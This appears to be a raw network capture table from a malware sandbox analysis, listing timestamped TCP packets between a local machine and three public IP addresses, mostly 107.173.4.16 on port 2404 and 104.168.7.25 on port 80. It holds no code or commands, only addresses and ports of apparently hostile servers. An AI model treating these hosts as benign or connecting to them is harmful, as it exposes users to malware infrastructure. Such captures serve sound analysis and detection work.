                                                                Oct 12, 2024 16:39:57.893898964 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893918037 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893923998 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893935919 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893938065 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893958092 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893968105 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893975973 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893984079 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893996000 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894002914 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894017935 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894025087 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894038916 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894040108 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894040108 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894056082 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894058943 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894079924 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894081116 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894098997 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894109011 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894118071 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894121885 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894140959 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894141912 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894161940 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894164085 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894181013 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894184113 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894197941 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894201994 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894222021 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894224882 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894241095 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894248009 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894263029 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894263983 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894277096 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894283056 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.894310951 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.894319057 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:58.940135002 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:40:00.029484034 CEST8049169104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:40:00.029706955 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:40:01.816705942 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:01.821715117 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:01.821789026 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:01.835572004 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:01.840750933 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.317919016 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.451214075 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.455454111 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.483292103 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.488054991 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.491604090 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.496576071 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.497721910 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.502582073 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.502652884 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.507514954 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.669639111 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.678883076 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.683729887 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.826550961 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.963604927 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.963824987 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.968218088 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.973017931 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:02.973114014 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.982873917 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:02.988949060 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.069430113 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:40:03.074429989 CEST8049173178.237.33.50192.168.2.22
                                                                Oct 12, 2024 16:40:03.074502945 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:40:03.074881077 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:40:03.079706907 CEST8049173178.237.33.50192.168.2.22
                                                                Oct 12, 2024 16:40:03.453098059 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.589782953 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.589922905 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.628504038 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.633441925 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.633502007 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.638314009 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.638362885 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.643184900 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.717297077 CEST8049173178.237.33.50192.168.2.22
                                                                Oct 12, 2024 16:40:03.717468023 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:40:03.767057896 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.772058010 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800260067 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800290108 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800304890 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800321102 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800335884 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800365925 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800381899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800400019 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800401926 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800424099 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800431967 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800445080 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800462008 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800477982 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800478935 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800503016 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.800528049 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800550938 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.800601959 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.805691004 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.898533106 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.898561001 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.898576021 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.898603916 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.898636103 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.899591923 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899703026 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899717093 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899748087 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.899786949 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899802923 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899818897 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899831057 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.899836063 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.899859905 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.900516033 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.900532007 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.900548935 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.900563955 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.900573969 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.900605917 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.901025057 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.901077986 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.901102066 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.901119947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.901123047 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.901137114 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.901160955 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.903511047 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903527021 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903543949 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903564930 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903568029 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.903584003 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903606892 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.903613091 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.903655052 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.904007912 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.904021978 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.904062033 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.937422037 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:03.999946117 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:03.999995947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.000010967 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.000039101 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.000055075 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.000056028 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.000073910 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.000076056 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.000114918 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.002512932 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002563000 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002578020 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002612114 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.002638102 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002655983 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002681017 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.002717972 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002736092 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002757072 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.002809048 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002825022 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002840996 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002849102 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.002856016 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.002878904 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003097057 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003123999 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003137112 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003139019 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003175020 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003281116 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003298044 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003324986 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003336906 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003341913 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003359079 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003376961 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003592968 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003634930 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003693104 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003709078 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003725052 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003741026 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003748894 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003758907 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003777027 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003778934 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003813982 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.003829956 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003849030 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003863096 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.003885031 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004298925 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004338980 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004364014 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004381895 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004415989 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004453897 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004472017 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004488945 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004503965 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004508972 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004538059 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004734993 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004751921 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004767895 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004782915 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.004790068 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.004818916 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.005081892 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005135059 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005172968 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.005208969 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005225897 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005242109 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005259037 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.005281925 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.005294085 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.005409002 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.088856936 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088880062 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088907957 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088924885 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088928938 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.088943005 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088960886 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.088963985 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.088983059 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.089000940 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.089010000 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.089019060 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.089039087 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.089040041 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.089082956 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091198921 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091227055 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091243029 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091272116 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091346025 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091401100 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091453075 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091468096 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091485977 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091504097 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091506958 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091540098 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091633081 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091651917 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091666937 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091681957 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091697931 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091706038 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091712952 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091726065 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091730118 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091747046 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.091749907 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.091784000 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092164993 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092180014 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092196941 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092211008 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092216969 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092228889 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092248917 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092462063 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092478037 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092493057 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092508078 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092529058 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092535019 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092551947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092566967 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092586040 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092909098 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092928886 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092943907 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092957020 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.092957973 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.092981100 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093000889 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093024015 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093039036 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093044996 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093055964 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093070030 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093080044 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093086004 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093101978 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093111038 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093120098 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093137026 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093149900 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093178988 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093835115 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093851089 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093871117 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093894005 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093897104 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093909025 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093924999 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093938112 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093940973 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093956947 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.093966007 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.093997002 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.094460964 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096189022 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096204996 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096220016 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096234083 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096242905 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096257925 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096273899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096278906 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096290112 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096309900 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096318007 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096327066 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096342087 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.096348047 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.096359015 CEST240449172107.173.4.16192.168.2.22
